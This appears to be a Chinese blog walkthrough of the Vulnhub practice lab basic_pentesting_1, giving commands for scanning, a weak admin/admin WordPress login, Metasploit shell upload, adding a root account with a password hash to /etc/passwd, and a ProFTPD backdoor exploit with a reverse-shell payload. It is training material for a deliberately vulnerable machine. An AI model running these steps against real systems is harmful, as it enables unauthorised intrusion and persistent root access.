basic_pentesting_1靶场攻略

basic_pentesting_1 是 Vulnhub 平台提供的虚拟化渗透测试靶场镜像,主要用于练习基础渗透测试技术。该靶场通过模拟网络环境中的常见漏洞场景,帮助用户熟悉信息收集、漏洞利用等实战技能。任务是获取靶场的root权限。

获取ip

通过netdiscover获取ip,未开启虚拟机的时候执行一次,开启后再执行一次,找到新增的ip

css 复制代码
 netdiscover -i eth0 -r 192.168.244.0/24

这边找到的ip是192.168.244.143

扫描端口

复制代码
 nmap -sV 192.168.244.143
 -sV:启用版本检测功能,识别开放端口上运行的服务及其具体版本。

收集到信息

PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

web端口测试

通过浏览器访问地址:

就使用dirb爆破一下网站目录看是否有其他可以利用的

arduino 复制代码
 dirb http://192.168.244.143 -w 
ruby 复制代码
 http://192.168.244.143/secret/wp-admin/

会自动跳转登录页面:

注意这边开头的是域名vtcsec,不是ip。ping vtcsec 即是目标服务器的ip。

尝试弱口令登录,测试到账号与密码是admin|admin,登录成功;

查看是否有可以利用的漏洞

复制代码
 searchsploit wordpress 4.9

登录msfconsole后,执行:

bash 复制代码
 search wordpress type:exploit -s date

分析利用的格式wp_XXX,说明关键字wp的漏洞根据不同的模块进行划分,我们这边是admin,找到exploit/unix/webapp/wp_admin_shell_upload,我们就使用这个。

perl 复制代码
 use 43
 show options
arduino 复制代码
 set username admin
 set password admin
 set rhosts 192.168.244.143
 set TARGETURI /secret
 run

登录成功,但用户是www-data。

shell登录后,会话转换成bash模式,执行下面命令

rust 复制代码
 python -c 'import pty; pty.spawn("/bin/bash")'

查看/etc/passwd 与/etc/shadow的权限情况:

这边我们是可以修改/etc/passwd的,那么新增一个账号与密码:newrootnewroot

退回到meterpreter的会话下,执行:

ruby 复制代码
 edit /etc/passwd
 #新增下面一行
 newroot:$1$iE0btf0c$pbJNv7hPOGSmeTE1tKepM/:0:0:root:/root:/bin/bash

shell登录后,转到bash模式下,执行:

bash 复制代码
 su newroot
 #然后输入密码newroot

注意:这边必须要有密码,如果是x或者空,则无法登录,如下:

另外/etc/crontab文件也是可以编辑的,可以添加反弹shell的功能。

ftp端口测试

查看ftp的版本,看看是否有漏洞:

r 复制代码
 searchsploit ProFTPD 1.3.3c

登录msfconsole,然后查找漏洞的利用:

r 复制代码
 search ProFTPD 1.3.3c
perl 复制代码
 use 0
 show options
bash 复制代码
 #设置目标服务器ip
 set rhosts 192.168.244.143
 #设置利用载荷
 set payload cmd/unix/reverse
 #设置载荷的反弹shell地址
 set lhost 192.168.244.140
 run

直接是root的权限。

相关推荐
用户9623779544812 小时前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机15 小时前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机15 小时前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户9623779544817 小时前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star17 小时前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户9623779544820 小时前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
阁老2 天前
pytest测试框架:如何确保登录模块先执行并共享登录状态
测试
cipher2 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
_志哥_3 天前
Superpowers 技术指南:让 AI 编程助手拥有超能力
人工智能·ai编程·测试
一次旅行5 天前
网络安全总结
安全·web安全